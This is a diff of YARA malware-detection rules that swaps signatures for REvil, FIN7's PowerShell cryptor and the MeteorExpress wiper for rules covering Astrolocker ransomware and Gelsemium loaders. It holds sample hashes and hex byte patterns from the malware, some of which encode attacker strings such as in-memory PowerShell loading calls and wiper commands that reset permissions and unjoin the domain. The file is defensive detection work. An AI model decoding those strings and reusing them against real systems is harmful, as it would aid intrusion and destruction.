+		$seq_Jan_2021_2 = { 4c 8d 05 20 47 00 00 41 8b ce 48 8d 15 1e 47 00 00 e8 [2] 00 00 ba 04 01 00 00 48 8d 4c 24 40 ff 15 ?? 43 00 00 85 c0 75 12 b8 5c 00 00 00 c7 44 24 40 43 00 3a 00 66 89 44 24 44 89 6c 24 38 4c 8d 8c 24 78 02 00 00 48 89 6c 24 30 48 8d 4c 24 40 48 89 6c 24 28 45 33 c0 33 d2 48 89 6c 24 20 66 89 6c 24 46 ff 15 6b 44 00 00 44 8b 84 24 78 02 00 00 48 8d 15 e4 45 00 00 85 c0 b9 bd 07 a2 41 44 0f 44 c1 41 8b c8 44 89 84 24 78 02 00 00 c1 c9 09 41 8b c0 89 4c 24 28 45 8b c8 c1 c8 06 48 8d 4c 24 40 41 c1 c9 03 89 44 24 20 ff 15 8b 44 00 00 4c 8d 44 24 40 33 d2 33 c9 ff 15 ?? 42 00 00 48 85 c0 74 1b ff 15 [2] 00 00 3d b7 00 00 00 74 0e bf 01 00 00 00 48 8d 15 fe 45 00 00 eb 09 8b fd 48 8d 15 a3 45 00 00 41 8b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 70KB and ( pe.imphash ( ) == "d4a5e8c255211639195793920eeda70f" and 2 of ( $asm* ) and 12 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 1 of ( $seq* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Revil_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Astrolocker_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect the ELF version of REvil ransomware"
+		description = "Detect the Astrolocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "b4b9d60e-a352-5045-8be3-e9a08d70ef6b"
-		date = "2021-06-28"
-		modified = "2021-06-29"
-		reference = "https://twitter.com/jaimeblascob/status/1409603887871500288"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-28/REvil/RAN_ELF_REvil_Jun_2021_1.yara#L1-L22"
+		id = "f2c2c96a-277e-575b-8d80-4729f4a1cfe4"
+		date = "2020-05-12"
+		modified = "2021-05-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_Astrolocker_May_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "054bdb8362fdea2dc914b11387f6c67e35932acb73ba2b133ca29f69549914ba"
-		score = 75
+		logic_hash = "7e50642f5f864b7cffeb5ccf4581ac7566da24fd5361a3303a860f036cd6d439"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "3d375d0ead2b63168de86ca2649360d9dcff75b3e0ffa2cf1e50816ec92b3b7d"
-		hash2 = "d6762eff16452434ac1acc127f082906cc1ae5b0ff026d0d4fe725711db47763"
-		hash3 = "796800face046765bd79f267c56a6c93ee2800b76d7f38ad96e5acb92599fcd4"
-		hash4 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4"
+		hash1 = "7fe1686f4afb9907f880a5e77bf30bc00fae71980f57ca70b60b7b1716456a2f"
+		hash2 = "b26749b17ca691328ba67ee49d4d9997c101966c607ab578afad204459b7bf8f"
 		tlp = "White"
-		adversary = "RAAS"
+		adversary = "-"
+		level = "Experimental"
 
 	strings:
-		$seq1 = { 55 48 89 e5 48 83 c4 80 bf 04 20 00 00 e8 69 d5 ff ff 48 89 45 f8 ?? 8b 05 [2] 31 00 [0-4] 48 8b 3d [2] 31 00 48 8b 35 [2] 31 00 48 8b 0d [2] 31 00 4c 8b 0d [2] 31 00 4c 8b [2] 13 31 00 48 8b 15 ?? 13 31 00 48 8b 45 f8 4c 89 ?? 24 18 48 89 7c 24 10 48 89 74 24 08 48 89 0c 24 ?? 89 }
-		$seq2 = { 48 89 e5 bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff 8b 05 [2] 20 00 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff }
-		$seq3 = { 48 83 ec 20 c7 45 fc 00 00 00 00 eb 64 8b 45 fc 48 8b 14 c5 48 92 61 00 48 8b 05 ?? bd 20 00 48 89 c6 bf 40 93 61 00 b8 00 00 00 00 e8 ?? 3f ff ff 8b 45 fc 48 8b 04 c5 48 92 61 00 48 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 ?? 3d ff ff be [2] 41 00 bf 40 93 61 00 e8 ?? 3e ff ff 48 89 45 f0 48 8b 45 f0 48 89 c7 e8 ?? 3d ff ff 83 45 fc 01 83 7d fc 00 74 96 48 8b 05 [2] 20 00 48 89 c7 e8 ?? 3c ff ff 48 8b 05 [2] 20 00 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 e8 48 8b 45 e8 48 89 c7 e8 ?? 3d ff ff c9 c3 55 48 89 e5 48 83 ec 20 48 89 7d e8 48 8b 45 e8 48 89 c7 e8 ?? 3c ff ff 89 c2 8b 05 ?? d0 30 00 01 d0 83 c0 01 89 c7 e8 ?? 91 ff ff 48 89 45 f8 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3c ff ff 48 8b 45 f8 48 c7 c1 ff ff ff ff 48 89 c2 b8 00 00 00 00 48 89 d7 f2 ae 48 89 c8 48 f7 d0 48 8d 50 ff 48 8b 45 f8 48 01 d0 66 c7 00 2f 00 48 8b 15 ?? cf 30 00 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3e ff ff 48 8b 45 f8 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 f0 48 83 7d f0 00 }
-		$seq4 = { 48 89 e5 48 83 ec 10 c7 45 fc 58 00 00 00 8b 45 fc 48 8d 55 f0 48 89 c6 bf 00 a5 71 00 e8 [2] 00 00 48 89 05 ?? 0b 31 00 48 8d 45 f0 48 89 c2 be 20 00 00 00 bf c0 a4 71 00 e8 [2] 00 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 b7 fd ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 80 fe ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 ?? 0a 31 00 48 c7 05 ?? 0a 31 00 [2] 41 00 e8 ?? f6 ff ff e8 f1 f7 ff ff b8 01 00 00 00 }
+		$seq_Mar_2021_1 = { 6a 00 6a 00 ff 15 88 60 41 00 81 3d cc e6 b8 02 57 0f 00 00 8b 0d b4 c4 41 00 8b 15 b8 c4 41 00 a1 bc c4 41 00 89 4c 24 2c 89 54 24 20 89 44 24 24 75 14 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 28 60 41 00 8b 2d a8 60 41 00 c7 44 24 1c 20 00 00 00 8d 9b 00 00 00 00 8b 54 24 18 8b ce c1 e1 04 03 4c 24 20 8b c6 c1 e8 05 89 4c 24 14 8d 0c 32 89 44 24 10 8b 44 24 24 01 44 24 10 31 4c 24 14 81 3d cc e6 b8 02 f5 03 00 00 c7 05 0c da b8 02 36 06 ea e9 75 08 6a 00 ff 15 5c 60 41 00 8b 4c 24 14 31 4c 24 10 83 3d cc e6 b8 02 42 75 30 6a 00 6a 00 6a 00 ff d5 6a 30 8d 54 24 3c 6a 00 52 c7 44 24 40 00 00 00 00 e8 5a 5e ff ff 83 c4 0c 6a 00 8d 44 24 38 50 6a 00 ff 15 00 60 41 00 2b 5c 24 10 8b cb c1 e1 04 81 3d cc e6 b8 02 8c 07 00 00 89 4c 24 14 75 09 6a 00 6a 00 e8 d2 eb fe ff }
+		$seq_Apr_2021_1 = { 89 44 24 38 48 8b 05 78 4e 00 00 48 89 05 b9 9e 00 00 48 8b 05 52 4e 00 00 48 89 05 b3 9e 00 00 48 8b 05 4c 4e 00 00 48 89 05 ad 9e 00 00 48 8b 05 46 4e 00 00 48 89 05 a7 9e 00 00 8b 05 51 9e }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 50KB and 3 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 1 of ( $seq* )
 }
-rule ARKBIRD_SOLG_CRIM_FIN7_PS_Cryptor_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_2 : FILE
 {
 	meta:
-		description = "Detect PS Cryptor used by FIN7 for Diceloader and Carbanak"
+		description = "Detect Gelsenicine malware (Loader - Variant 2)"
 		author = "Arkbird_SOLG"
-		id = "26361500-c33e-59c8-a53f-a881966c71a7"
-		date = "2021-06-07"
-		modified = "2021-06-07"
-		reference = "https://twitter.com/z0ul_/status/1401795117678219267"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-07/FIN7/CRIM_FIN7_PS_Cryptor_Jun_2021_1.yara#L1-L28"
+		id = "c6e28da2-622b-57ba-9381-9f8f6b8879bf"
+		date = "2021-06-12"
+		modified = "2021-06-14"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_2.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "d7eadaa6dec75ecfa2f03860f41b39dbe9e7ffc9e6ad743497586356301ef67c"
+		logic_hash = "e1d6402c743af697c8d1b34087b6fe9db80237834d73967b0a0638023d4e4a40"
 		score = 75
-		quality = 55
+		quality = 75
 		tags = "FILE"
-		hash1 = "944e47dc9da19b753beba173214cdebea2aa3651c402dfacae2dde82c4fdaa43"
-		hash2 = "fada67a9f89429d6c191cd6fef5d75cd7b49eebaa2e40d1dd1f9884b3038a23b"
-		hash3 = "0f083aac77fb734a8e81fb9dff218f0414ac6c4c9a23b2832837fbc2c7e2031d"
-		hash4 = "dc9442838b464e96281a32705c9b5958e4f45dbefd1ef4a885fac9898af0a4b7"
-		hash5 = "fad295cf65552061dc553c21d89d8bbd0b02783c01f5e696232df6a14381c206"
-		tlp = "White"
-		adversary = "FIN7"
+		hash1 = "6eaeca0cf28e74de6cfd82d29a3c3cc30c2bc153ac811692cc41ee290d766474"
+		hash1 = "d986207bc108e55f4b110ae208656b415d2c5fcc8f99f98b4b3985e82b9d5e5b"
+		hash1 = "ec491de0e2247f64b753c4ef0c7227ea3548c2f222b547528dae0cf138eca53a"
+		tlp = "white"
+		adversary = "Gelsemium"
 
 	strings:
-		$s1 = { 3d 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 44 65 66 6c 61 74 65 53 74 72 65 61 6d 28 5b 49 4f 2e 4d 65 6d 6f 72 79 53 74 72 65 61 6d 5d 5b 42 79 74 65 5b 5d [6-12] 5b 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 5d 3a 3a 44 65 63 6f 6d 70 72 65 73 73 29 }
-		$s2 = { 40 28 5b 49 6e 74 50 74 72 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 29 28 5b 49 6e 74 50 74 72 5d 29 }
-		$s3 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 29 2e 47 65 74 54 79 70 65 28 29 2c 20 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c }
-		$s4 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 }
-		$s5 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c 29 }
-		$s6 = { 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 43 75 72 72 65 6e 74 44 6f 6d 61 69 6e 2e 47 65 74 41 73 73 65 6d 62 6c 69 65 73 28 29 20 7c 20 57 68 65 72 65 2d 4f 62 6a 65 63 74 20 7b 20 24 5f 2e 47 6c 6f 62 61 6c 41 73 73 65 6d 62 6c 79 43 61 63 68 65 20 2d 41 6e 64 20 24 5f 2e 4c 6f 63 61 74 69 6f 6e 2e 53 70 6c 69 74 28 27 5c 5c 27 29 5b 2d 31 5d 2e 45 71 75 61 6c 73 28 28 }
-		$s7 = { 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 53 74 61 6e 64 61 72 64 2c }
-		$s8 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 5d 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 28 24 }
-		$s9 = { 3d 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 24 }
-		$s10 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 43 6f 70 79 28 24 }
-		$s11 = { 3d 5b 49 6e 74 50 74 72 5d 3a 3a 5a 65 72 6f }
+		$s1 = { 48 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 c7 44 24 40 00 00 00 00 8b 05 [3] 00 a8 01 0f 85 96 00 00 00 83 c8 01 89 05 [3] 00 33 c0 88 44 24 40 4c 8d 44 24 40 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 48 4c 8d 44 24 48 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 40 4c 8d 44 24 40 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 33 c0 88 44 24 48 4c 8d 44 24 48 48 8d 15 [3] 00 48 8d 0d [3] 00 ff 15 [2] 00 00 90 48 8d 0d [2] 00 00 e8 [2] 00 00 90 48 c7 43 08 00 00 00 00 48 c7 43 10 00 00 00 00 48 c7 43 18 00 00 00 00 4c 8d 0d [3] 00 4c 8d 05 [3] 00 33 d2 48 8b cb e8 86 f9 ff ff 48 8b c3 48 83 c4 30 }
+		$s2 = { 54 00 65 00 6d 00 70 00 2f 00 00 00 00 00 00 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 2f 00 00 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 2f 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2f }
+		$s3 = { 48 8b ca e8 [3] 00 48 39 5e 08 75 05 48 8b c3 eb 08 48 8b 46 10 48 2b 46 08 3b c3 0f 4c c3 48 63 c8 e8 [3] 00 48 89 47 08 48 8b 56 10 48 8b 4e 08 4c 8b d8 eb 10 4c 3b db 74 05 8a 01 41 88 03 49 ff c3 48 ff c1 48 3b ca 75 eb 4c 89 5f 10 4c 89 5f 18 48 8b c7 48 83 c4 20 5f 5e }
+		$s4 = { 45 33 c9 45 33 c0 ba 80 00 00 00 48 8b ce e8 16 f2 ff ff 84 c0 74 71 48 8d 53 18 41 b8 20 00 00 00 48 8b ce e8 e4 f4 ff ff 84 c0 74 5b 48 8d 53 38 41 b8 20 00 00 00 48 8b ce e8 56 f9 ff ff 84 c0 74 45 48 8b 43 10 48 8b 0d [3] 00 48 3b c1 74 0d 48 8b d8 48 8b 00 48 3b c1 75 f5 eb 1b 48 8b 43 08 eb 07 48 8b d8 48 8b 40 08 48 3b 58 10 74 f3 48 39 43 10 48 0f }
 
 	condition:
-		filesize > 40KB and 8 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_WIP_Meteorexpress_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Gelsemium_Gelsevirine_June_2021_1 : FILE
 {
 	meta:
-		description = "Detect MeteorExpress/BreakWin wiper"
+		description = "Detect Gelsevirine malware (Main Plug-in)"
 		author = "Arkbird_SOLG"
-		id = "6dffc8c9-ccd0-5cf3-8f3c-38adad8508b2"
-		date = "2021-08-06"
-		modified = "2021-08-07"
-		reference = "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-07/BreakWin/WIP_MeteorExpress_Aug_2021_1.yara#L1-L26"
+		id = "31900186-2531-5558-aafb-67707040ddaf"
+		date = "2021-06-12"
+		modified = "2021-06-14"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsevirine_June_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "80e40479d699b988d1282e407edd51b5e3ea796ebf380d82f5a5aafaacafe75d"
+		logic_hash = "06e7ee49092621c8469eeb1cd9e5cc1420a1879084e0d0a39181dc046bfa00cf"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		hash1 = "2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b"
-		hash2 = "074bcc51b77d8e35b96ed444dc479b2878bf61bf7b07e4d7bd4cf136cc3c0dce"
-		hash3 = "6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4"
-		hash4 = "9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473"
+		hash1 = "1a9d78e5c255de239fb18b2cf47c4c2298f047073299c27fb54a0edf08a1d5a1"
+		hash1 = "51b9296ff1f562350cd63abd22c6032ef26d5ae6a3e2e5e0f851d8b1a5d0ee35"
 		tlp = "white"
-		adversary = "-"
+		adversary = "Gelsemium"
 
 	strings:
-		$s1 = { 8d 04 2a 8b f1 3b c8 0f 42 f0 33 c9 8b c6 83 c0 01 0f 92 c1 f7 d9 0b c8 e8 42 00 00 00 53 68 18 2c 41 00 50 89 44 24 1c 89 5f 10 89 77 14 e8 aa 20 00 00 8b 74 24 1c 83 c4 0c c6 04 1e 00 83 fd 10 72 0a 8b 0f 8d 55 01 e8 50 00 00 00 5d 89 37 8b c7 5f 5e 5b 59 }
-		$s2 = { 68 cc 00 00 00 b8 [3] 00 e8 [2] 00 00 8b f1 89 75 8c 83 4d d4 ff 33 c0 83 4d d8 ff 6a 44 5f 57 50 89 45 dc 89 45 e0 8d 45 90 50 e8 [3] 00 8d 46 1c 89 7d 90 83 c4 0c 83 78 14 08 72 02 8b 00 89 45 98 8d 7d e4 33 c0 83 c6 04 ab 8b ce 83 7e 14 08 ab ab 72 02 8b 0e 8b 46 10 8d 04 41 8b ce 72 02 8b 0e ff 75 8c 33 d2 50 51 8d 4d e4 89 55 e4 89 55 e8 89 55 ec e8 [2] fd ff 33 d2 89 55 fc 8b 45 e8 89 55 88 39 45 ec 74 0d 33 c9 66 89 08 83 c0 02 89 45 e8 eb 0f 8d 4d 88 51 50 8d 4d e4 e8 3c 02 00 00 33 d2 8b 7d 8c 8d 4d d4 51 8d 4d 90 51 8b 47 34 52 52 52 52 52 52 ff 75 e4 52 ff 70 04 ff 15 08 [2] 00 85 c0 74 28 ff 75 d8 8d 4f 3c e8 [2] ff ff ff 75 d4 8d }
-		$s3 = { 8b ec 83 e4 f8 83 ec 7c a1 14 50 41 00 33 c4 89 44 24 78 8b 45 0c 8b 4d 08 89 0c 24 53 56 57 83 e8 01 0f 84 05 01 00 00 83 e8 01 0f 84 23 01 00 00 83 e8 0d 74 15 ff 75 14 ff 75 10 ff 75 0c 51 ff 15 2c e1 40 00 e9 0b 01 00 00 8d 44 24 40 c6 05 f4 63 41 00 01 50 51 ff 15 30 e1 40 00 8b d8 6a 00 89 5c 24 18 ff 15 10 e0 40 00 8b f0 8d 44 24 48 56 50 53 ff 15 28 e1 40 00 56 ff 15 0c e0 40 00 83 3d f8 63 41 00 00 0f 84 8d 00 00 00 53 ff 15 04 e0 40 00 ff 35 f8 63 41 00 89 44 24 14 50 ff 15 00 e0 40 00 8b d8 8d 44 24 18 50 6a 18 ff 35 f8 63 41 00 ff 15 14 e0 40 00 8b 7c 24 20 8d 44 24 30 8b 74 24 1c 50 ff 74 24 10 ff 15 44 e1 40 00 8b 44 24 38 2b c6 8b 74 24 10 68 20 00 cc 00 99 2b c2 6a 00 8b c8 8b 44 24 44 6a 00 56 ff 74 24 30 2b c7 d1 f9 ff 74 24 30 99 2b c2 d1 f8 50 51 ff 74 24 34 ff 15 18 e0 40 00 53 56 ff 15 00 e0 40 00 56 ff 15 08 e0 40 00 8d 44 24 40 }
-		$s4 = { 38 1b 38 26 38 2e 38 39 38 3f 38 4a 38 50 38 5e 38 67 38 6c 38 79 38 7e 38 ec 38 }
-		$s5 = { 55 8b ec 51 a1 60 57 41 00 83 f8 fe 75 0a e8 8e 0d 00 00 a1 60 57 41 00 83 f8 ff 75 07 b8 ff ff 00 00 eb 1b 6a 00 8d 4d fc 51 6a 01 8d 4d 08 51 50 ff 15 50 e0 40 00 85 c0 74 e2 66 8b 45 08 8b }
-		$s6 = { 69 63 61 63 6c 73 2e 65 78 65 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 44 61 74 61 5c 53 2d 31 2d 35 2d 31 38 5c 52 65 61 64 4f 6e 6c 79 22 20 2f 72 65 73 65 74 20 2f 54 }
-		$s7 = { 77 6d 69 63 20 63 6f 6d 70 75 74 65 72 73 79 73 74 65 6d 20 77 68 65 72 65 20 6e 61 6d 65 3d 22 25 63 6f 6d 70 75 74 65 72 6e 61 6d 65 25 22 20 63 61 6c 6c 20 75 6e 6a 6f 69 6e 64 6f 6d 61 69 6e 6f 72 77 6f 72 6b 67 72 6f 75 70 }
-		$s8 = { 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 }
-		$s9 = { 8b 55 ?? 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 08 ff 15 ?? ?? 47 00 8b d0 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 09 8d 45 ?? 50 8d 45 ?? 50 8d 4d ?? e8 ?? ?? ?? ff 83 ec 0c 8b cc 89 65 ?? 51 ff 70 04 ff 30 e8 ?? ?? ?? ff c6 45 fc 0a 83 ec 18 8b cc 89 65 ?? 68 ?? ?? 48 00 e8 ?? ?? ?? ff c6 45 fc 0b c6 45 fc 09 8d }
+		$s1 = { 48 8b c4 55 41 56 41 57 48 8d a8 38 fa ff ff 48 81 ec b0 06 00 00 48 c7 85 a0 02 00 00 fe ff ff ff 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 60 20 48 8b 05 68 bf 0b 00 48 33 c4 48 89 85 a0 05 00 00 45 33 e4 4c 89 65 08 4c 89 65 10 44 89 64 24 20 48 8d 54 24 20 48 8d 4d 08 e8 30 96 01 00 90 48 c7 85 f8 00 00 00 07 00 00 00 4c 89 a5 f0 00 00 00 66 44 89 a5 e0 00 00 00 45 8d 44 24 04 48 8d 15 79 d8 08 00 48 8d 8d e0 00 00 00 e8 dd b0 00 00 90 48 8d 8d e0 00 00 00 e8 50 30 ff ff 90 48 83 bd f8 00 00 00 08 72 0d 48 8b 8d e0 00 00 00 ff 15 b0 32 06 00 48 c7 85 b8 01 00 00 07 00 00 00 4c 89 a5 b0 01 00 00 66 44 89 a5 a0 01 00 00 41 b8 10 00 00 00 48 8d 15 61 d6 08 00 48 8d 8d a0 01 00 00 e8 85 b0 00 00 90 48 8d 95 a0 01 00 00 48 8d 8d 80 05 00 00 e8 41 96 01 00 90 48 83 bd b8 01 00 00 08 72 0d 48 8b 8d a0 01 00 00 ff 15 51 32 06 00 48 c7 85 68 04 00 00 07 00 00 00 4c 89 a5 60 04 00 00 66 44 89 a5 50 04 00 00 48 c7 85 78 01 00 00 07 00 00 00 4c 89 a5 70 01 00 00 66 44 89 a5 60 01 00 00 49 83 ce ff 4d 8b ce 45 33 c0 48 8d 95 80 05 00 00 48 8d 8d 60 01 00 00 e8 c8 ae 00 00 90 48 8d 95 60 01 00 00 48 8d 8d e0 01 00 00 e8 e4 5b ff ff 90 48 8d 8d 50 04 00 00 48 3b c8 74 15 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 50 04 00 00 e8 92 ae 00 00 48 8d 8d 50 04 00 00 e8 b6 11 ff ff 90 48 83 bd f8 01 00 00 08 72 0d 48 8b 8d e0 01 00 00 ff 15 a6 31 06 00 48 c7 85 f8 01 00 00 07 00 00 00 4c 89 a5 f0 01 00 00 66 44 89 a5 e0 01 00 00 48 83 bd 78 01 00 00 08 72 0d 48 8b 8d 60 01 00 00 ff 15 75 31 06 00 33 d2 48 8d 8d 50 04 00 00 e8 5f 2b 04 00 48 c7 85 58 01 00 00 07 00 00 00 4c 89 a5 50 01 00 00 66 44 89 a5 40 01 00 00 41 b8 0d 00 00 00 48 8d 15 b8 e2 08 00 48 8d 8d 40 01 00 00 e8 3c af 00 00 90 e8 96 2d ff ff 48 8d 48 30 48 8d 95 40 01 00 00 e8 b6 77 00 00 48 8b c8 e8 fe dc 02 00 48 8b c8 e8 16 d5 ff ff 90 48 83 bd 58 01 00 00 08 72 0d 48 8b 8d 40 01 00 00 ff 15 f6 30 06 00 48 c7 85 18 01 00 00 07 00 00 00 4c 89 a5 10 01 00 00 66 44 89 a5 00 01 00 00 41 b8 24 00 00 00 48 8d 15 d7 e3 08 00 48 8d 8d 00 01 00 00 e8 cb ae 00 00 90 48 8d 8d 00 01 00 00 e8 ce 6b 00 00 84 c0 0f 94 c3 48 83 bd 18 01 00 00 08 72 0d 48 8b 8d 00 01 00 00 ff 15 9a 30 06 00 84 db 0f 84 36 08 00 00 4c 89 a5 88 04 00 00 4c 89 a5 90 04 00 00 e8 f7 3b 01 00 48 89 85 88 04 00 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 41 b8 0b 00 00 00 48 8d 15 2a d6 08 00 48 8d 4d 38 e8 59 ae 00 00 90 e8 b3 2c ff ff 48 8d 48 30 48 8d 55 38 e8 96 75 00 00 48 